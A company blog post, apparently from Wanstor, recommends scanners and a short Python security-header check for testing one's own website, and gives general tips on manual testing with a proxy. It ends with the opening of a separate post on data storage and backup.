Website security tools

Once you think you have done all you can, it’s time to test your website security. The most effective way of doing this is via website security tools, often referred to as penetration testing, or pen testing for short. There are many commercial and free products to assist you with this. They work on a similar basis to the scripts hackers use, in that they test all known exploits and attempt to compromise your site using some of the previously mentioned methods, such as SQL injection.

Some free tools that are worth looking at include:

  • Netsparker (Free community edition and trial version available). Good for testing SQL injection and XSS.
  • OpenVAS claims to be the most advanced open source security scanner. Good for testing known vulnerabilities; it currently scans over 25,000. But it can be difficult to set up and requires an OpenVAS server to be installed, which only runs on *nix. OpenVAS was a fork of Nessus before that product became closed-source and commercial.
  • SecurityHeaders.io is a tool offering a free online check that quickly reports which of the security headers mentioned above (such as CSP and HSTS) a domain has enabled and correctly configured (a minimal local equivalent is sketched after this list).
  • Xenotix XSS Exploit Framework is a tool from OWASP (Open Web Application Security Project) that includes a huge selection of XSS attack examples, which you can run to quickly confirm whether your site’s inputs are vulnerable in Chrome, Firefox and IE.
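
For a rough local equivalent of that online header check, the Python sketch below requests a page (the URL is hypothetical) and reports which of a few important response headers are present; it is a quick sanity check, not a substitute for a proper scanner.

```python
import requests

EXPECTED_HEADERS = [
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Content-Type-Options",
    "X-Frame-Options",
]

def check_security_headers(url: str) -> None:
    response = requests.get(url, timeout=10)
    for header in EXPECTED_HEADERS:
        status = "present" if header in response.headers else "MISSING"
        print(f"{header}: {status}")

check_security_headers("https://www.example.com")   # hypothetical target
```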

The results from automated tests can be daunting, as they present a wealth of potential issues. The important thing is to focus on the critical issues first. Each issue reported normally comes with a good explanation of the potential vulnerability. You will probably find that some of the issues rated as low or medium in importance aren’t a concern for your site. If you wish to take things a step further then there are some further steps you can take to manually try to compromise your site by altering POST/GET values. A debugging proxy can assist you here as it allows you to intercept the values of an HTTP request between your browser and the server. A popular freeware application called Fiddler is a good starting point.

So what should you be trying to alter on the request? If you have pages which should only be visible to a logged-in user, then try changing URL parameters such as the user ID, or cookie values, in an attempt to view the details of another user. Another area worth testing is forms: change the POST values to attempt to submit code to perform XSS, or to upload a server-side script.

Hopefully these tips will help keep your site and information safe. Thankfully most Content Management Systems have inbuilt website security features, but it is still a good idea to have knowledge of the most common security exploits so you can make sure you are covered.

For more information about Wanstor’s IT security solutions, please click here – https://www.wanstor.com/managed-it-security-services-business.htm


Storage and Backup Peace of Mind

26th August 2016

The ongoing issue with storage is that, as a modern organisation, you continue to generate data in ever greater quantities. That data needs to be stored and be accessible “on demand”, as well as being securely backed up. By implementing a data storage and backup solution that allows you to scale your storage smoothly, in an easily manageable and non-disruptive manner, you get the peace of mind of knowing that your data is safe.
